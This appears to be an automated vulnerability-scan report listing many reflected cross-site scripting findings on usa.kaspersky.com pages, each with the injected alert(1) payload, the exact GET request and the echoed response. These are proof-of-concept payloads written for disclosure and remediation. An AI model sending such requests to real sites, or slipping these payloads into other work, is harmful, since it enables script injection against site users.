<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/index.html?1eb7a"><script>alert(1)</script>b8beb20b2dd=1" />
...[SNIP]...
1.71. http://usa.kaspersky.com/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://usa.kaspersky.com
Path: /index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf166"-alert(1)-"c843acf5a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.html?cf166"-alert(1)-"c843acf5a4=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e8ad"-alert(1)-"90934118b45 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25232"><script>alert(1)</script>11c08334a02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eae4"><script>alert(1)</script>52b4770be9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee881"-alert(1)-"2890634d7c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97cbc"><script>alert(1)</script>51d3a489a86 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eccfd"-alert(1)-"a2f812229c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f2b6"><script>alert(1)</script>377e8706d52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60fc8"-alert(1)-"39c8314a1f9f02d6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; it was possible, however, to convert it to a GET request, which makes the attack easier to demonstrate and deliver.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c717d"-alert(1)-"861f505fc3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99bf4"><script>alert(1)</script>4d3ab9eb3b25b2b8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; it was possible, however, to convert it to a GET request, which makes the attack easier to demonstrate and deliver.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bbd5"><script>alert(1)</script>923210a76f3673d75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; it was possible, however, to convert it to a GET request, which makes the attack easier to demonstrate and deliver.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a089"><script>alert(1)</script>3c8b24be29a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da3f8"-alert(1)-"318c97f1b524ecda2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; it was possible, however, to convert it to a GET request, which makes the attack easier to demonstrate and deliver.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff38b"-alert(1)-"240ef35a4a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 192f1"><script>alert(1)</script>390a361a01e590170 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25387"><script>alert(1)</script>fb612ec141d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/node/12354/lightbox225387"><script>alert(1)</script>fb612ec141d" /> ...[SNIP]...
1.88. http://usa.kaspersky.com/node/12354/lightbox2 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/node/12354/lightbox2
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 995fa"><script>alert(1)</script>7517b2c51a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the pure-pp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f70"><script>alert(1)</script>83f6663b944a6dc68 was submitted in the pure-pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26d2f"><script>alert(1)</script>c7577d70262 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2acfe"-alert(1)-"72f5f76d863 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef28f"-alert(1)-"9c47b60f00f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58af2"><script>alert(1)</script>22e36934d59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/node/1700758af2"><script>alert(1)</script>22e36934d59" /> ...[SNIP]...
1.94. http://usa.kaspersky.com/node/17007 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/node/17007
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a3ff"><script>alert(1)</script>359df1f9655 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8802f"-alert(1)-"54076cce41c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /node8802f"-alert(1)-"54076cce41c/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab898"><script>alert(1)</script>b8234a2510c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /nodeab898"><script>alert(1)</script>b8234a2510c/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 936f7"-alert(1)-"cd3a31c3f38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /node/index.html936f7"-alert(1)-"cd3a31c3f38 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fcf"><script>alert(1)</script>ee3eca5136f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /node/index.htmle9fcf"><script>alert(1)</script>ee3eca5136f HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/node/index.htmle9fcf"><script>alert(1)</script>ee3eca5136f" /> ...[SNIP]...
1.99. http://usa.kaspersky.com/node/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/node/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74a6a"-alert(1)-"474c2192743 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /node/index.html?74a6a"-alert(1)-"474c2192743=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.100. http://usa.kaspersky.com/node/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/node/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebdb9"><script>alert(1)</script>512ff95029d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /node/index.html?ebdb9"><script>alert(1)</script>512ff95029d=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1927f"><script>alert(1)</script>4da6a2e3d63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products-services1927f"><script>alert(1)</script>4da6a2e3d63/home-computer-security/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e87a"-alert(1)-"63b94f304e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products-services4e87a"-alert(1)-"63b94f304e1/home-computer-security/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 482c7"><script>alert(1)</script>ca326f1366e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products-services/home-computer-security482c7"><script>alert(1)</script>ca326f1366e/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42846"-alert(1)-"1737ec5e156 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products-services/home-computer-security42846"-alert(1)-"1737ec5e156/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28525"><script>alert(1)</script>9ade6974e30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products-services/home-computer-security/index.html28525"><script>alert(1)</script>9ade6974e30 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62dbd"-alert(1)-"91cf1275c68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products-services/home-computer-security/index.html62dbd"-alert(1)-"91cf1275c68 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 784c6"><script>alert(1)</script>ea35560650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products-services/home-computer-security/index.html?784c6"><script>alert(1)</script>ea35560650=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50061"-alert(1)-"b1568a13e65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products-services/home-computer-security/index.html?50061"-alert(1)-"b1568a13e65=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ed40"><script>alert(1)</script>c411af10f77 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc970"-alert(1)-"d7b46699d0c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7a80"><script>alert(1)</script>c1160999181 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75ac9"-alert(1)-"44655643b9d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60faf"-alert(1)-"aea51866174 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75d19"><script>alert(1)</script>e6a94cf142d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/internet-security75d19"><script>alert(1)</script>e6a94cf142d" /> ...[SNIP]...
1.115. http://usa.kaspersky.com/products-services/home-computer-security/internet-security [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d3d5"><script>alert(1)</script>0c315f9bb81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee59a"-alert(1)-"e444da54003 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7232c"><script>alert(1)</script>8b2c2136941 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cd88"-alert(1)-"318679f3559 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6afa"><script>alert(1)</script>dc1a0daf0d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c305"-alert(1)-"ab57f4ebc3c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48453"><script>alert(1)</script>f916dd51d3f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/mobile-security48453"><script>alert(1)</script>f916dd51d3f" /> ...[SNIP]...
1.122. http://usa.kaspersky.com/products-services/home-computer-security/mobile-security [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c748"><script>alert(1)</script>97e9ae62b7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ICID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45594"><script>alert(1)</script>43356559f66 was submitted in the ICID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb7f5"-alert(1)-"314b0280887 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a252"><script>alert(1)</script>7809b8460a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a91a9"-alert(1)-"929e765b02d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fedd"><script>alert(1)</script>9235e22f1fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4455"><script>alert(1)</script>c974b3a38d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3516d"-alert(1)-"539626fa5f8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.130. http://usa.kaspersky.com/products-services/home-computer-security/pure [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/products-services/home-computer-security/pure
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b09c3"><script>alert(1)</script>346be129cf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79397"><script>alert(1)</script>d1dc6a9e10c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d244"-alert(1)-"79edbca8ad5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
